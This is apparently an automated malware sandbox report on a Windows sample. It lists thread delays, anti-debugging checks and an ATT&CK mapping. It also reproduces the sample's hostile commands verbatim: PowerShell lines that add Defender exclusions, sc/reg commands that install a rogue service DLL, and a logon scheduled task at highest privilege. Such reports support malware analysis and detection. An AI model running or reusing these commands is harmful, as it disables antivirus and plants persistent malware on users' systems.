Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2183
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7662
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1872
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7303
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2206
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7723
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1980
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7262
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7510
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2051
Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows\System32\svchost.exeDropped PE file which has not been started: C:\Windows\System32\winsvcf\x549596.dat
Source: C:\Windows\System32\svchost.exeAPI coverage: 1.4 %
Source: C:\Windows\System32\console_zero.exeAPI coverage: 1.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep count: 5358 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep count: 4446 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448Thread sleep count: 7399 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448Thread sleep count: 2183 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 5852Thread sleep count: 83 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4528Thread sleep count: 7662 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4528Thread sleep count: 1872 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3364Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5988Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep count: 7303 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep count: 2206 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5288Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\console_zero.exe TID: 5372Thread sleep time: -46000s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 7056Thread sleep count: 116 > 30
Source: C:\Windows\System32\timeout.exe TID: 632Thread sleep count: 132 > 30
Source: C:\Windows\System32\console_zero.exe TID: 5580Thread sleep time: -46000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5556Thread sleep count: 7723 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3536Thread sleep count: 1980 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6856Thread sleep count: 7262 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6856Thread sleep count: 2352 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6744Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3580Thread sleep count: 7510 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep count: 2051 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3392Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeCode function: 26_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h26_2_64946F50
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB039A40 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,26_2_00007FFBAB039A40
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB0398FC FindClose,FindFirstFileExW,GetLastError,26_2_00007FFBAB0398FC
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2AC5F4 FindClose,FindFirstFileExW,GetLastError,32_2_00007FF70F2AC5F4
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2AC668 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,32_2_00007FF70F2AC668
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 60000
Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 46000
Source: svchost.exe, 0000001A.00000002.2847004878.0000013B8442B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess information queried: ProcessInformation

Anti Debugging

Source: C:\Windows\System32\svchost.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_26-81271
Source: C:\Windows\System32\svchost.exeCode function: 26_2_649461C0 IsDebuggerPresent,RaiseException,26_2_649461C0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF9FC30 GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,GetSystemDirectoryW,LoadLibraryW,32_2_00007FFBBAF9FC30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows \System32\printui.exeCode function: 13_2_00007FF616B11880 SetUnhandledExceptionFilter,13_2_00007FF616B11880
Source: C:\Windows \System32\printui.exeCode function: 13_2_00007FF616B11B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FF616B11B5C
Source: C:\Windows\System32\svchost.exeCode function: 26_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_64947650
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,26_2_6828C940
Source: C:\Windows\System32\svchost.exeCode function: 26_2_68295201 SetUnhandledExceptionFilter,26_2_68295201
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A14E8 SetUnhandledExceptionFilter,26_2_682A14E8
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB0499E8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00007FFBAB0499E8
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB03BFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FFBAB03BFA0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB49EE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FFBAB49EE70
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2BAE2C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00007FF70F2BAE2C
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2ADEB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_00007FF70F2ADEB0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFBA8B4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00007FFBBAFBA8B4
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFB9E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_00007FFBBAFB9E30

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\svchost.exeFile created: x549596.dat.26.dr
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Users\user\Desktop\58VSNPxrI4.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\timeout.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Users\user\Desktop\58VSNPxrI4.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start x939048
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x939048 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x939048\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x939048.dat" /f && sc start x939048
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesA,26_2_682952B9
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoA,26_2_68295290
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesA,26_2_682A1430
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoA,26_2_682A1460
Source: C:\Windows\System32\svchost.exe Code function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp,26_2_682864E0
Source: C:\Windows\System32\svchost.exe Code function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort,26_2_68287D70
Source: C:\Windows\System32\svchost.exe Code function: getenv,GetLocaleInfoA,26_2_68286680
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,26_2_00007FFBAB064C8C
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoW,26_2_00007FFBAB056B5C
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesEx,26_2_00007FFBAB056A8C
Source: C:\Windows\System32\svchost.exe Code function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,26_2_00007FFBAB056FB8
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,26_2_00007FFBAB064E84
Source: C:\Windows\System32\svchost.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,26_2_00007FFBAB064424
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,FormatMessageA,26_2_00007FFBAB03A128
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW,26_2_00007FFBAB064858
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW,26_2_00007FFBAB064788
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW,26_2_00007FFBAB05667C
Source: C:\Windows\System32\console_zero.exe Code function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,32_2_00007FF70F2C1B08
Source: C:\Windows\System32\console_zero.exe Code function: GetLocaleInfoEx,GetLocaleInfoW,32_2_00007FF70F2C17A0
Source: C:\Windows\System32\console_zero.exe Code function: EnumSystemLocalesEx,32_2_00007FF70F2C16D0
Source: C:\Windows\System32\console_zero.exe Code function: EnumSystemLocalesW,32_2_00007FF70F2C142C
Source: C:\Windows\System32\console_zero.exe Code function: GetLocaleInfoEx,FormatMessageA,32_2_00007FF70F2AC2E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\58VSNPxrI4.exe Code function: 0_2_00007FF783AC6F94 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF783AC6F94
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\console_zero.exe Code function: 32_2_00007FFBBAF6EFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,32_2_00007FFBBAF6EFC0
Source: C:\Windows\System32\console_zero.exe Code function: 32_2_00007FFBBAFA1EA6 bind,WSAGetLastError,32_2_00007FFBBAFA1EA6
Source: C:\Windows\System32\console_zero.exe Code function: 32_2_00007FFBBAF9B3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,32_2_00007FFBBAF9B3F0
Source: C:\Windows\System32\console_zero.exe Code function: 32_2_00007FFBBAF57410 memset,WSAGetLastError,strchr,inet_pton,htons,strtoul,inet_pton,htons,WSAGetLastError,htons,htons,bind,htons,bind,WSAGetLastError,32_2_00007FFBBAF57410
Source: C:\Windows\System32\console_zero.exe Code function: 32_2_00007FFBBAFA2130 bind,WSAGetLastError,32_2_00007FFBBAFA2130
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | OS Credential Dumping | 11 System Time Discovery | 1 Exploitation of Remote Services | 12 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact |
| Credentials | Domains | Default Accounts | 1 Native API | 1 Valid Accounts | 1 Valid Accounts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
